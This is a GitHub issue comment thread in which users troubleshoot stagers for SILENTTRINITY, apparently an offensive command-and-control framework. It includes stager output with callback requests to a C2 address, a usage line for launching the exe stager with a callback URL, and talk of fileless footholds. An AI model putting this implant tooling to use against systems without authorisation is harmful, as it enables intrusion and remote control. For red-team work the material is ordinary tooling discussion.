Comments (9)
@OscarAkaElvis I'm going to be digging into this in an hour or so after I murder some fools in Borderlands
from silenttrinity.
Quite weird... doing more tests, sometimes I receive the stager, but in a loop again and again and again very quickly.
from silenttrinity.
Below is the output from the PowerShell stager from the latest SILENTTRINITY git pull. I think the problem lies with the stage.boo file:
Stage.boo(411,34): BCE0044: Block must be indented.
[] Attempting HTTP POST to https://192.168.1.164/e1cfb3da-9a72-4e72-84c7-25cb4bf53572
[-] Attempt #1
[] Attempting HTTP GET to https://192.168.1.164/e1cfb3da-9a72-4e72-84c7-25cb4bf53572
[-] Attempt #1
[*] Downloaded 569008 bytes
[*] Compiling Stage Code
[-] Error(s) compiling script, this probably means your Boo script has bugs
If you replace that file with the old one, you won't see this problem.
from silenttrinity.
Fixed, this was my bad. Was playing with stuff the other day with the stage.boo file and forgot to remove it from the commit.
Cheers
from silenttrinity.
Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
from silenttrinity.
> Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
stager.exe <guid> <psk> <CallBack_URL>
from silenttrinity.
> > Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
>
> stager.exe <guid> <psk> <CallBack_URL>

Thanks, but I mean the guid and psk have to be pulled off the database, I don't see any output when I generate the stager
from silenttrinity.
> > > Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
> >
> > stager.exe <guid> <psk> <CallBack_URL>
>
> Thanks, but I mean the guid and psk have to be pulled off the database, I don't see any output when I generate the stager

I've added a 'getpsk' feature that allows you to do this inside the CLI in a pull that hasn't been accepted yet (here). The binary is mainly used for injection and I think the assumption is you'd be going for more of a 'fileless' attack for a foothold. However, I'm not 100% sure of why the psk isn't disclosed when 'generating' the exe stager. Thinking about it now, there should probably be an option to 'generate' a vanilla binary and one with the guid/psk/CB_urls embedded in it (so there is no need to supply command line arguments) along with the option to use an already generated guid/psk or a new pair.
BTW, currently nothing really happens when it's 'generated'. It's just a copy of what is in the /data folder.
from silenttrinity.
> > > > Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
> > >
> > > stager.exe <guid> <psk> <CallBack_URL>
> >
> > Thanks, but I mean the guid and psk have to be pulled off the database, I don't see any output when I generate the stager
>
> I've added a 'getpsk' feature that allows you to do this inside the CLI in a pull that hasn't been accepted yet (here). The binary is mainly used for injection and I think the assumption is you'd be going for more of a 'fileless' attack for a foothold. However, I'm not 100% sure of why the psk isn't disclosed when 'generating' the exe stager. Thinking about it now, there should probably be an option to 'generate' a vanilla binary and one with the guid/psk/CB_urls embedded in it (so there is no need to supply command line arguments) along with the option to use an already generated guid/psk or a new pair.
> BTW, currently nothing really happens when it's 'generated'. It's just a copy of what is in the /data folder.

Gotcha. I was in fact thinking of a binary where GUID/PSK/IP are already present. Thanks for clarifying.
from silenttrinity.